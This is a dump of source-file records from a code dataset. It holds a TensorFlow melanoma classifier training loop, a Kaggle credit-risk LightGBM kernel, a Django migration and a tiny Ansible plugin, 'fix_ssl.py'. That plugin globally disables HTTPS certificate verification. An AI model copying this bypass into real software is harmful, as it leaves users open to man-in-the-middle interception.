local4 = tf.nn.relu(tf.matmul(local3, weights) + biases, name=scope.name)
tf.summary.histogram('Fully connected layers/fc2', local4)
tf.summary.scalar('Fully connected layers/fc2', tf.nn.zero_fraction(local4))
with tf.variable_scope('output') as scope:
weights = variable_with_weight_decay('weights', [192, _NUM_CLASSES], stddev=1 / 192.0, wd=0.0)
biases = variable_on_cpu('biases', [_NUM_CLASSES], tf.constant_initializer(0.0))
softmax_linear = tf.add(tf.matmul(local4, weights), biases, name=scope.name)
tf.summary.histogram('Fully connected layers/output', softmax_linear)
y_pred_cls = tf.argmax(softmax_linear, axis=1)
return softmax_linear, y_pred_cls
def variable_with_weight_decay(name, shape, stddev, wd):
dtype = tf.float32
var = variable_on_cpu( name, shape, tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def variable_on_cpu(name, shape, initializer):
with tf.device('/cpu:0'):
dtype = tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def average_gradients(tower_grads):
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
def predict_valid(show_confusion_matrix=False):
'''
Make prediction for all images in test_x
'''
images_valid = tf.placeholder(tf.float32, shape=[None , 224*224*3])
labels_valid = tf.placeholder(tf.float32, shape=[None , 2])
valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
valid_count = len(valid_x)
shuffle_order = [i for i in range(valid_count)]
random.shuffle(shuffle_order)
# print(shuffle_order)
print("iterations {}".format(num_iterations))
valid_x = valid_x[shuffle_order].reshape(valid_count, -1)
valid_y = valid_y[shuffle_order].reshape(valid_count, -1)
i = 0
y_pred = np.zeros(shape=len(valid_x), dtype=np.int)
output, y_pred_class = core_model(images_valid, labels_valid, _NUM_CLASSES)
while i < len(valid_x):
j = min(i + _BATCH_SIZE, len(valid_x))
batch_xs = valid_x[i:j, :]
batch_ys = valid_y[i:j, :]
y_pred[i:j] = sess.run(y_pred_class, feed_dict={images_valid: batch_xs, labels_valid: batch_ys})
i = j
correct = (np.argmax(valid_y, axis=1) == y_pred)
acc = correct.mean() * 100
correct_numbers = correct.sum()
print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
y_true = np.argmax(valid_y, axis=1)
cm = metrics.confusion_matrix(y_true=y_true, y_pred=y_pred)
for i in range(_NUM_CLASSES):
class_name = "({}) {}".format(i, valid_l[i])
print(cm[i, :], class_name)
class_numbers = [" ({0})".format(i) for i in range(_NUM_CLASSES)]
print("".join(class_numbers))
auc = metrics.roc_auc_score(y_true, y_pred)
print("Auc on Valid Set: {}".format(auc))
f1_score = metrics.f1_score(y_true, y_pred)
print("F1 score: {}".format(f1_score))
average_precision = metrics.average_precision_score(y_true, y_pred)
print("average precsion on valid: {}".format(average_precision))
FP = cm.sum(axis=0) - np.diag(cm)
FN = cm.sum(axis=1) - np.diag(cm)
TP = np.diag(cm)
TN = cm.sum() - (FP + FN + TP)
return
tf.reset_default_graph()
with tf.Graph().as_default(), tf.device('/cpu:0'):
loader = data_loader.DataReaderISIC2017(_BATCH_SIZE, _EPOCHS, gpu_nums)
train_x, train_y, train_l = loader.getTrainDataForClassificationMelanoma()
num_iterations = loader.iterations
print("Iterations {}".format(num_iterations))
total_count = loader.total_train_count
step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)
optimizer = tf.train.GradientDescentOptimizer(learning_rate)
images = tf.placeholder(tf.float32, shape=[None, 224*224*3])
labels = tf.placeholder(tf.float32, shape=[None, 2])
batch_size_gpu = tf.placeholder(tf.int32)
tower_grads = []
losses = []
y_pred_classes = []
for i in range(gpu_nums):
with tf.device('/gpu:{}'.format(i)):
with tf.name_scope("tower_{}".format(i)) as scope:
per_gpu_count = batch_size_gpu
start = i * per_gpu_count
end = start + per_gpu_count
output, y_pred_class = core_model(images[start:end,:],labels[start:end,:], _NUM_CLASSES)
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=labels[start:end,:]))
#losses = tf.get_collection('losses', scope)
# Calculate the total loss for the current tower.
#loss = tf.add_n(losses, name='total_loss')
losses.append(loss)
# Reuse variables for the next tower.
tf.get_variable_scope().reuse_variables()
grads = optimizer.compute_gradients(loss)
# Keep track of the gradients across all towers.
tower_grads.append(grads)
y_pred_classes.append(y_pred_class)
# We must calculate the mean of each gradient. Note that this is the
# synchronization point across all towers.
grads = average_gradients(tower_grads)
apply_gradient_op = optimizer.apply_gradients(grads, global_step=global_step)
losses_mean = tf.reduce_mean(losses)
y_pred_classes_op=tf.reshape(tf.stack(y_pred_classes, axis=0),[-1])
correct_prediction = tf.equal(y_pred_classes_op, tf.argmax(labels, axis=1))
batch_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
# variable_averages = tf.train.ExponentialMovingAverage(
# MOVING_AVERAGE_DECAY, global_step)
# variables_averages_op = variable_averages.apply(tf.trainable_variables())
# Group all updates to into a single train op.
# train_op = tf.group(apply_gradient_op, variables_averages_op)
train_op = apply_gradient_op
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
start = time.time()
# saver = tf.train.Saver(tf.all_variables())
saver = tf.train.Saver(tf.all_variables())
init = tf.initialize_all_variables()
saver = tf.train.Saver()
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
train_writer = tf.summary.FileWriter(_SAVE_PATH, sess.graph)
try:
print("Trying to restore last checkpoint ...")
last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=_SAVE_PATH)
saver.restore(sess, save_path=last_chk_path)
print("Restored checkpoint from:", last_chk_path)
except:
print("Failed to restore checkpoint. Initializing variables instead.")
sess.run(tf.global_variables_initializer())
step_global = sess.run(global_step)
step_local = int(math.ceil(_EPOCHS * total_count / _BATCH_SIZE))
epoch_done = int(math.ceil(step_global / (_BATCH_SIZE)))
print("global:{}, local: {}, epochs done {}".format(step_global, step_local, epoch_done))
if step_local < step_global:
print("Training steps completed: global: {}, local: {}".format(step_global, step_local))
exit()
#predict_valid()
for epoch in range(epoch_done,_EPOCHS ):
#print(total_count)
shuffle_order=[i for i in range(total_count)]
random.shuffle(shuffle_order)
#print(shuffle_order)
print("iterations {}".format(num_iterations))
train_x = train_x[shuffle_order].reshape(total_count, -1)
train_y = train_y[shuffle_order].reshape(total_count, -1)
# this mehod is suitable when we load all training data in memory at once.
lastEpoch=0
for i in range(num_iterations):
#print(num_iterations+_BATCH_SIZE)
#print(loader.total_train_count)
startIndex = _BATCH_SIZE * i * gpu_nums
endIndex = min(startIndex + _BATCH_SIZE * gpu_nums, total_count )
#print("epoch:{}, iteration:{}, start:{}, end:{} ".format(epoch, i, startIndex, endIndex))
batch_xs = train_x[startIndex:endIndex,:]
batch_ys = train_y[startIndex:endIndex,:]
#print("feed data shape {} , {}".format(batch_xs.shape, batch_ys.shape))
#print(batch_ys)
start_time = time.time()
_,step_global_out, loss_out, batch_accuracy_out = sess.run([train_op,global_step, losses_mean, batch_accuracy], feed_dict={batch_size_gpu:_BATCH_SIZE,images: batch_xs, labels: batch_ys})
steps = + i
if (i % 5 == 0) or (i == _EPOCHS * total_count - 1):
#print("train epoch: {}, iteration: {}, Accuracy: {}, loss: {}".format(epoch, i, batch_accuracy_out, loss_out ))
duration = time.time() - start_time
#msg = "Epoch: {0:}, Global Step: {1:>6}, accuracy: {2:>6.1%}, loss = {3:.2f} ({4:.1f} examples/sec, {5:.2f} sec/batch)"
#print(msg.format(epoch,step_global, batch_acc, _loss, _BATCH_SIZE / duration, duration))
if i!=0 and epoch!=lastEpoch:
lastEpoch=epoch
valid_x, valid_y, valid_l = loader.getValidationDataForClassificationMelanoma()
total_count_valid = len(valid_x)
startIndex = 0 # for validation there is just
endIndex = min(startIndex + _BATCH_SIZE_VALID * gpu_nums, total_count_valid)
# all variable should have a idffierent name.
step_global_out, batch_accuracy_valid_out = sess.run([global_step, batch_accuracy],
feed_dict={batch_size_gpu:_BATCH_SIZE_VALID,images: valid_x, labels: valid_y})
print("valid epoch: {}, iteration: {}, Accuracy: {}".format(epoch, i, batch_accuracy_out ))
# batch_xs = valid_x[startIndex:endIndex, :]
# batch_ys = valid_y[startIndex:endIndex, :]
# print("feed data shape for validation {} , {}".format(batch_xs.shape, batch_ys.shape))
# # print(batch_ys)
#
# start_time = time.time()
# step_global_out, loss_out, y_pred_out = sess.run([global_step, losses, y_pred_classes],
# feed_dict={images: batch_xs, labels: batch_ys})
# y_pred = np.asarray(y_pred_out).reshape(-1)
# correct = (np.argmax(valid_y, axis=1) == y_pred)
# acc = correct.mean() * 100
# correct_numbers = correct.sum()
# print("Accuracy on Valid-Set: {0:.2f}% ({1} / {2})".format(acc, correct_numbers, len(valid_x)))
#print("Saving checkpoint............")
#saver.save(sess, save_path=_SAVE_PATH, global_step=global_step)
#predict_valid()
# if (step_global % 100 == 0) or (i == _EPOCHS * total_count - 1):
# data_merged, global_1 = sess.run([merged, global_step], feed_dict={x: batch_xs, y: batch_ys})
# #acc = predict_test()
#
# # summary = tf.Summary(value=[
# # tf.Summary.Value(tag="Accuracy/test", simple_value=acc),
# # ])
# # train_writer.add_summary(data_merged, global_1)
# # train_writer.add_summary(summary, global_1)
#
|
[
"milton.2002@yahoo.com"
] |
milton.2002@yahoo.com
|
491dc44ae36dbbbd2a8115d6c4c80ac79186d685
|
5ec09f479c7a680f77d2b8e5da675e24daf82da7
|
/callback_plugins/fix_ssl.py
|
330fc989837e7a72fe813929f80bb61a65438884
|
[] |
no_license
|
tbuchi888/vagrant-yaml-ansible
|
1f2d3bcb5d35d3d1e72c1cda2730bc761d33e812
|
0837e62a3a835d94cb9200160548034f26e3a991
|
refs/heads/master
| 2021-01-10T02:52:51.389484
| 2016-03-19T16:05:58
| 2016-03-19T16:05:58
| 54,269,456
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
import ssl
if hasattr(ssl, '_create_default_https_context') and hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
class CallbackModule(object):
pass
|
[
"tbuchi888@users.noreplay.github.com"
] |
tbuchi888@users.noreplay.github.com
|
41a86538fd422e72ba79da31cd965f050d59b26c
|
9e27cc85675ec764a62764decdc85d6b57a10be3
|
/kaggle_kernel.py
|
63533471d892f754944895ad665a85aa841ca8ee
|
[] |
no_license
|
jsamaitis/Home-Credit-Default-Risk-2018
|
07886e3992301ca8e855773d615a41eecf647b5d
|
26d690eabe137d210e963b2daf36d03adfc057d4
|
refs/heads/master
| 2020-03-24T21:13:48.635974
| 2018-08-13T08:13:26
| 2018-08-13T08:13:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,043
|
py
|
# HOME CREDIT DEFAULT RISK COMPETITION
# Most features are created by applying min, max, mean, sum and var functions to grouped tables.
# Little feature selection is done and overfitting might be a problem since many features are related.
# The following key ideas were used:
# - Divide or subtract important features to get rates (like annuity and income)
# - In Bureau Data: create specific features for Active credits and Closed credits
# - In Previous Applications: create specific features for Approved and Refused applications
# - Modularity: one function for each table (except bureau_balance and application_test)
# - One-hot encoding for categorical features
# All tables are joined with the application DF using the SK_ID_CURR key (except bureau_balance).
# You can use LightGBM with KFold or Stratified KFold. Please upvote if you find usefull, thanks!
# Update 16/06/2018:
# - Added Payment Rate feature
# - Removed index from features
# - Set early stopping to 200 rounds
# - Use standard KFold CV (not stratified)
# Public LB increased to 0.792
import numpy as np
import pandas as pd
import gc
import time
from contextlib import contextmanager
from lightgbm import LGBMClassifier
from sklearn.metrics import roc_auc_score, roc_curve
from sklearn.model_selection import KFold, StratifiedKFold
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
@contextmanager
def timer(title):
t0 = time.time()
yield
print("{} - done in {:.0f}s".format(title, time.time() - t0))
# One-hot encoding for categorical columns with get_dummies
def one_hot_encoder(df, nan_as_category = True):
original_columns = list(df.columns)
categorical_columns = [col for col in df.columns if df[col].dtype == 'object']
df = pd.get_dummies(df, columns= categorical_columns, dummy_na= nan_as_category)
new_columns = [c for c in df.columns if c not in original_columns]
return df, new_columns
# Preprocess application_train.csv and application_test.csv
def application_train_test(num_rows = None, nan_as_category = False):
# Read data and merge
df = pd.read_csv('data/application_train.csv', nrows= num_rows)
test_df = pd.read_csv('data/application_test.csv', nrows= num_rows)
print("Train samples: {}, test samples: {}".format(len(df), len(test_df)))
df = df.append(test_df).reset_index()
# Optional: Remove 4 applications with XNA CODE_GENDER (train set)
df = df[df['CODE_GENDER'] != 'XNA']
# Categorical features with Binary encode (0 or 1; two categories)
for bin_feature in ['CODE_GENDER', 'FLAG_OWN_CAR', 'FLAG_OWN_REALTY']:
df[bin_feature], uniques = pd.factorize(df[bin_feature])
# Categorical features with One-Hot encode
df, cat_cols = one_hot_encoder(df, nan_as_category)
# NaN values for DAYS_EMPLOYED: 365.243 -> nan
df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace= True)
# Some simple new features (percentages)
df['DAYS_EMPLOYED_PERC'] = df['DAYS_EMPLOYED'] / df['DAYS_BIRTH']
df['INCOME_CREDIT_PERC'] = df['AMT_INCOME_TOTAL'] / df['AMT_CREDIT']
df['INCOME_PER_PERSON'] = df['AMT_INCOME_TOTAL'] / df['CNT_FAM_MEMBERS']
df['ANNUITY_INCOME_PERC'] = df['AMT_ANNUITY'] / df['AMT_INCOME_TOTAL']
df['PAYMENT_RATE'] = df['AMT_ANNUITY'] / df['AMT_CREDIT']
del test_df
gc.collect()
return df
# Preprocess bureau.csv and bureau_balance.csv
def bureau_and_balance(num_rows = None, nan_as_category = True):
bureau = pd.read_csv('data/bureau.csv', nrows = num_rows)
bb = pd.read_csv('data/bureau_balance.csv', nrows = num_rows)
bb, bb_cat = one_hot_encoder(bb, nan_as_category)
bureau, bureau_cat = one_hot_encoder(bureau, nan_as_category)
# Bureau balance: Perform aggregations and merge with bureau.csv
bb_aggregations = {'MONTHS_BALANCE': ['min', 'max', 'size']}
for col in bb_cat:
bb_aggregations[col] = ['mean']
bb_agg = bb.groupby('SK_ID_BUREAU').agg(bb_aggregations)
bb_agg.columns = pd.Index([e[0] + "_" + e[1].upper() for e in bb_agg.columns.tolist()])
bureau = bureau.join(bb_agg, how='left', on='SK_ID_BUREAU')
bureau.drop(['SK_ID_BUREAU'], axis=1, inplace= True)
del bb, bb_agg
gc.collect()
# Bureau and bureau_balance numeric features
num_aggregations = {
'DAYS_CREDIT': ['min', 'max', 'mean', 'var'],
'DAYS_CREDIT_ENDDATE': ['min', 'max', 'mean'],
'DAYS_CREDIT_UPDATE': ['mean'],
'CREDIT_DAY_OVERDUE': ['max', 'mean'],
'AMT_CREDIT_MAX_OVERDUE': ['mean'],
'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],
'AMT_CREDIT_SUM_OVERDUE': ['mean'],
'AMT_CREDIT_SUM_LIMIT': ['mean', 'sum'],
'AMT_ANNUITY': ['max', 'mean'],
'CNT_CREDIT_PROLONG': ['sum'],
'MONTHS_BALANCE_MIN': ['min'],
'MONTHS_BALANCE_MAX': ['max'],
'MONTHS_BALANCE_SIZE': ['mean', 'sum']
}
# Bureau and bureau_balance categorical features
cat_aggregations = {}
for cat in bureau_cat: cat_aggregations[cat] = ['mean']
for cat in bb_cat: cat_aggregations[cat + "_MEAN"] = ['mean']
bureau_agg = bureau.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})
bureau_agg.columns = pd.Index(['BURO_' + e[0] + "_" + e[1].upper() for e in bureau_agg.columns.tolist()])
# Bureau: Active credits - using only numerical aggregations
active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]
active_agg = active.groupby('SK_ID_CURR').agg(num_aggregations)
active_agg.columns = pd.Index(['ACTIVE_' + e[0] + "_" + e[1].upper() for e in active_agg.columns.tolist()])
bureau_agg = bureau_agg.join(active_agg, how='left', on='SK_ID_CURR')
del active, active_agg
gc.collect()
# Bureau: Closed credits - using only numerical aggregations
closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]
closed_agg = closed.groupby('SK_ID_CURR').agg(num_aggregations)
closed_agg.columns = pd.Index(['CLOSED_' + e[0] + "_" + e[1].upper() for e in closed_agg.columns.tolist()])
bureau_agg = bureau_agg.join(closed_agg, how='left', on='SK_ID_CURR')
del closed, closed_agg, bureau
gc.collect()
return bureau_agg
# Preprocess previous_applications.csv
def previous_applications(num_rows = None, nan_as_category = True):
prev = pd.read_csv('data/previous_application.csv', nrows = num_rows)
prev, cat_cols = one_hot_encoder(prev, nan_as_category= True)
# Days 365.243 values -> nan
prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)
prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)
prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)
prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)
# Add feature: value ask / value received percentage
prev['APP_CREDIT_PERC'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']
# Previous applications numeric features
num_aggregations = {
'AMT_ANNUITY': ['min', 'max', 'mean'],
'AMT_APPLICATION': ['min', 'max', 'mean'],
'AMT_CREDIT': ['min', 'max', 'mean'],
'APP_CREDIT_PERC': ['min', 'max', 'mean', 'var'],
'AMT_DOWN_PAYMENT': ['min', 'max', 'mean'],
'AMT_GOODS_PRICE': ['min', 'max', 'mean'],
'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],
'RATE_DOWN_PAYMENT': ['min', 'max', 'mean'],
'DAYS_DECISION': ['min', 'max', 'mean'],
'CNT_PAYMENT': ['mean', 'sum'],
}
# Previous applications categorical features
cat_aggregations = {}
for cat in cat_cols:
cat_aggregations[cat] = ['mean']
prev_agg = prev.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})
prev_agg.columns = pd.Index(['PREV_' + e[0] + "_" + e[1].upper() for e in prev_agg.columns.tolist()])
# Previous Applications: Approved Applications - only numerical features
approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]
approved_agg = approved.groupby('SK_ID_CURR').agg(num_aggregations)
approved_agg.columns = pd.Index(['APPROVED_' + e[0] + "_" + e[1].upper() for e in approved_agg.columns.tolist()])
prev_agg = prev_agg.join(approved_agg, how='left', on='SK_ID_CURR')
# Previous Applications: Refused Applications - only numerical features
refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]
refused_agg = refused.groupby('SK_ID_CURR').agg(num_aggregations)
refused_agg.columns = pd.Index(['REFUSED_' + e[0] + "_" + e[1].upper() for e in refused_agg.columns.tolist()])
prev_agg = prev_agg.join(refused_agg, how='left', on='SK_ID_CURR')
del refused, refused_agg, approved, approved_agg, prev
gc.collect()
return prev_agg
# Preprocess POS_CASH_balance.csv
def pos_cash(num_rows = None, nan_as_category = True):
pos = pd.read_csv('data/POS_CASH_balance.csv', nrows = num_rows)
pos, cat_cols = one_hot_encoder(pos, nan_as_category= True)
# Features
aggregations = {
'MONTHS_BALANCE': ['max', 'mean', 'size'],
'SK_DPD': ['max', 'mean'],
'SK_DPD_DEF': ['max', 'mean']
}
for cat in cat_cols:
aggregations[cat] = ['mean']
pos_agg = pos.groupby('SK_ID_CURR').agg(aggregations)
pos_agg.columns = pd.Index(['POS_' + e[0] + "_" + e[1].upper() for e in pos_agg.columns.tolist()])
# Count pos cash accounts
pos_agg['POS_COUNT'] = pos.groupby('SK_ID_CURR').size()
del pos
gc.collect()
return pos_agg
# Preprocess installments_payments.csv
def installments_payments(num_rows = None, nan_as_category = True):
ins = pd.read_csv('data/installments_payments.csv', nrows = num_rows)
ins, cat_cols = one_hot_encoder(ins, nan_as_category= True)
# Percentage and difference paid in each installment (amount paid and installment value)
ins['PAYMENT_PERC'] = ins['AMT_PAYMENT'] / ins['AMT_INSTALMENT']
ins['PAYMENT_DIFF'] = ins['AMT_INSTALMENT'] - ins['AMT_PAYMENT']
# Days past due and days before due (no negative values)
ins['DPD'] = ins['DAYS_ENTRY_PAYMENT'] - ins['DAYS_INSTALMENT']
ins['DBD'] = ins['DAYS_INSTALMENT'] - ins['DAYS_ENTRY_PAYMENT']
ins['DPD'] = ins['DPD'].apply(lambda x: x if x > 0 else 0)
ins['DBD'] = ins['DBD'].apply(lambda x: x if x > 0 else 0)
# Features: Perform aggregations
aggregations = {
'NUM_INSTALMENT_VERSION': ['nunique'],
'DPD': ['max', 'mean', 'sum'],
'DBD': ['max', 'mean', 'sum'],
'PAYMENT_PERC': ['max', 'mean', 'sum', 'var'],
'PAYMENT_DIFF': ['max', 'mean', 'sum', 'var'],
'AMT_INSTALMENT': ['max', 'mean', 'sum'],
'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],
'DAYS_ENTRY_PAYMENT': ['max', 'mean', 'sum']
}
for cat in cat_cols:
aggregations[cat] = ['mean']
ins_agg = ins.groupby('SK_ID_CURR').agg(aggregations)
ins_agg.columns = pd.Index(['INSTAL_' + e[0] + "_" + e[1].upper() for e in ins_agg.columns.tolist()])
# Count installments accounts
ins_agg['INSTAL_COUNT'] = ins.groupby('SK_ID_CURR').size()
del ins
gc.collect()
return ins_agg
# Preprocess credit_card_balance.csv
def credit_card_balance(num_rows = None, nan_as_category = True):
cc = pd.read_csv('data/credit_card_balance.csv', nrows = num_rows)
cc, cat_cols = one_hot_encoder(cc, nan_as_category= True)
# General aggregations
cc.drop(['SK_ID_PREV'], axis= 1, inplace = True)
cc_agg = cc.groupby('SK_ID_CURR').agg(['min', 'max', 'mean', 'sum', 'var'])
cc_agg.columns = pd.Index(['CC_' + e[0] + "_" + e[1].upper() for e in cc_agg.columns.tolist()])
# Count credit card lines
cc_agg['CC_COUNT'] = cc.groupby('SK_ID_CURR').size()
del cc
gc.collect()
return cc_agg
# LightGBM GBDT with KFold or Stratified KFold
# Parameters from Tilii kernel: https://www.kaggle.com/tilii7/olivier-lightgbm-parameters-by-bayesian-opt/code
def kfold_lightgbm(df, num_folds, stratified = False, debug= False):
# Divide in training/validation and test data
train_df = df[df['TARGET'].notnull()]
test_df = df[df['TARGET'].isnull()]
print("Starting LightGBM. Train shape: {}, test shape: {}".format(train_df.shape, test_df.shape))
del df
gc.collect()
# Cross validation model
if stratified:
folds = StratifiedKFold(n_splits= num_folds, shuffle=True, random_state=1001)
else:
folds = KFold(n_splits= num_folds, shuffle=True, random_state=1001)
# Create arrays and dataframes to store results
oof_preds = np.zeros(train_df.shape[0])
sub_preds = np.zeros(test_df.shape[0])
feature_importance_df = pd.DataFrame()
feats = [f for f in train_df.columns if f not in ['TARGET','SK_ID_CURR','SK_ID_BUREAU','SK_ID_PREV','index']]
for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df[feats], train_df['TARGET'])):
train_x, train_y = train_df[feats].iloc[train_idx], train_df['TARGET'].iloc[train_idx]
valid_x, valid_y = train_df[feats].iloc[valid_idx], train_df['TARGET'].iloc[valid_idx]
# LightGBM parameters found by Bayesian optimization
clf = LGBMClassifier(
nthread=4,
n_estimators=10000,
learning_rate=0.02,
num_leaves=34,
colsample_bytree=0.9497036,
subsample=0.8715623,
max_depth=8,
reg_alpha=0.041545473,
reg_lambda=0.0735294,
min_split_gain=0.0222415,
min_child_weight=39.3259775,
silent=-1,
verbose=-1, )
clf.fit(train_x, train_y, eval_set=[(train_x, train_y), (valid_x, valid_y)],
eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)
oof_preds[valid_idx] = clf.predict_proba(valid_x, num_iteration=clf.best_iteration_)[:, 1]
sub_preds += clf.predict_proba(test_df[feats], num_iteration=clf.best_iteration_)[:, 1] / folds.n_splits
fold_importance_df = pd.DataFrame()
fold_importance_df["feature"] = feats
fold_importance_df["importance"] = clf.feature_importances_
fold_importance_df["fold"] = n_fold + 1
feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)
print('Fold %2d AUC : %.6f' % (n_fold + 1, roc_auc_score(valid_y, oof_preds[valid_idx])))
del clf, train_x, train_y, valid_x, valid_y
gc.collect()
print('Full AUC score %.6f' % roc_auc_score(train_df['TARGET'], oof_preds))
# Write submission file and plot feature importance
if not debug:
test_df['TARGET'] = sub_preds
test_df[['SK_ID_CURR', 'TARGET']].to_csv(submission_file_name, index= False)
display_importances(feature_importance_df)
return feature_importance_df
# Display/plot feature importance
def display_importances(feature_importance_df_):
cols = feature_importance_df_[["feature", "importance"]].groupby("feature").mean().sort_values(by="importance", ascending=False)[:40].index
best_features = feature_importance_df_.loc[feature_importance_df_.feature.isin(cols)]
plt.figure(figsize=(8, 10))
sns.barplot(x="importance", y="feature", data=best_features.sort_values(by="importance", ascending=False))
plt.title('LightGBM Features (avg over folds)')
plt.tight_layout()
plt.savefig('lgbm_importances01.png')
def main(debug = False):
num_rows = 10000 if debug else None
df = application_train_test(num_rows)
with timer("Process bureau and bureau_balance"):
bureau = bureau_and_balance(num_rows)
print("Bureau df shape:", bureau.shape)
df = df.join(bureau, how='left', on='SK_ID_CURR')
del bureau
gc.collect()
with timer("Process previous_applications"):
prev = previous_applications(num_rows)
print("Previous applications df shape:", prev.shape)
df = df.join(prev, how='left', on='SK_ID_CURR')
del prev
gc.collect()
with timer("Process POS-CASH balance"):
pos = pos_cash(num_rows)
print("Pos-cash balance df shape:", pos.shape)
df = df.join(pos, how='left', on='SK_ID_CURR')
del pos
gc.collect()
with timer("Process installments payments"):
ins = installments_payments(num_rows)
print("Installments payments df shape:", ins.shape)
df = df.join(ins, how='left', on='SK_ID_CURR')
del ins
gc.collect()
with timer("Process credit card balance"):
cc = credit_card_balance(num_rows)
print("Credit card balance df shape:", cc.shape)
df = df.join(cc, how='left', on='SK_ID_CURR')
del cc
gc.collect()
with timer("Run LightGBM with kfold"):
feat_importance = kfold_lightgbm(df, num_folds= 5, stratified= False, debug= debug)
if __name__ == "__main__":
submission_file_name = "submission_kernel02.csv"
with timer("Full model run"):
main()
|
[
"aukslius@gmail.com"
] |
aukslius@gmail.com
|
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d
|
ac350894488b34318c11a65d35a0f8fdf69b7d50
|
/products/migrations/0001_initial.py
|
545343aa9abd1f1393c114e71c6c8e1aed73463f
|
[] |
no_license
|
phrac/onemgin
|
508f052304ddbc03f45e994ebe33769ae30d9336
|
7a029dbca1bd2725ceabc0741c7cfb47290aadb7
|
refs/heads/master
| 2021-01-16T19:31:10.929508
| 2015-09-08T23:53:43
| 2015-09-08T23:53:43
| 12,391,387
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,083
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Barcode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
],
),
migrations.CreateModel(
name='BarcodeType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('onemg', models.CharField(unique=True, max_length=13)),
('ean', models.CharField(unique=True, max_length=13)),
('upc', models.CharField(unique=True, max_length=12)),
('jan', models.CharField(max_length=13, null=True)),
('gtin', models.CharField(max_length=14, null=True)),
('nsn', models.CharField(max_length=14, null=True)),
('isbn10', models.CharField(max_length=10, null=True)),
('isbn13', models.CharField(max_length=13, null=True)),
('asin', models.CharField(max_length=10, null=True)),
('brand', models.CharField(max_length=128, null=True)),
('manufacturer', models.CharField(max_length=128, null=True)),
('mpn', models.CharField(max_length=64, null=True)),
('part_number', models.CharField(max_length=64, null=True)),
('sku', models.CharField(max_length=64, null=True)),
('model_number', models.CharField(max_length=64, null=True)),
('length', models.FloatField(null=True)),
('width', models.FloatField(null=True)),
('height', models.FloatField(null=True)),
('weight', models.FloatField(null=True)),
('description', models.CharField(max_length=512, null=True)),
('image_url', models.CharField(max_length=512, null=True)),
('amazon_url', models.URLField(null=True)),
('created', models.DateTimeField(auto_now_add=True, null=True)),
],
),
migrations.AddField(
model_name='barcode',
name='product',
field=models.ForeignKey(to='products.Product'),
),
migrations.AddField(
model_name='barcode',
name='type',
field=models.ForeignKey(to='products.BarcodeType'),
),
migrations.AlterUniqueTogether(
name='barcode',
unique_together=set([('product', 'type')]),
),
]
|
[
"derek@disflux.com"
] |
derek@disflux.com
|
8e1342c5a5fb325ae9a8dd315f48ea850dd6e3fb
|
9f9fa056d9f9a9a1671fd76009aaabeef9ce58d6
|
/output/wwinp_plot.py
|
